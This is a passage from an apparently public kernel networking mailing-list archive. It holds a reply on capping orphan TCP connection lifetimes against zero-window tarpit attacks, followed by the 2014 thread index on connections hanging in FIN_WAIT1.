> seconds-to-minutes range).
> 
> By contrast, AFAICT what we are talking about here for these
> ZWP-forever/tarpit scenarios is to be able to cap the maximum overall
> lifetime of an orphan connection. That's a different parameter, and
> folks might want to set it in the minutes-to-hours range.

Right, but TCP_USER_TIMEOUT should be improved nevertheless ?

Then, we might add support for another safety mechanism, but the bulk
load of TARPIT attacks would be already handled.

^ permalink raw reply	[flat|nested] 14+ messages in thread

end of thread, other threads:[~2014-09-16 17:04 UTC | newest]

Thread overview: 14+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2014-09-15 16:11 TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised Andrey Dmitrov
2014-09-15 19:43 ` Neal Cardwell
2014-09-16  9:29   ` Andrey Dmitrov
2014-09-15 23:15 ` Hannes Frederic Sowa
2014-09-15 23:37   ` Yuchung Cheng
2014-09-16 12:49     ` Andrey Dmitrov
2014-09-16  1:50   ` Eric Dumazet
2014-09-16  8:37     ` Hannes Frederic Sowa
2014-09-16 12:47   ` Andrey Dmitrov
2014-09-16 13:09     ` Eric Dumazet
2014-09-16 14:08       ` Andrey Dmitrov
2014-09-16 15:11       ` Yuchung Cheng
2014-09-16 16:31         ` Neal Cardwell
2014-09-16 17:04           ` Eric Dumazet

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.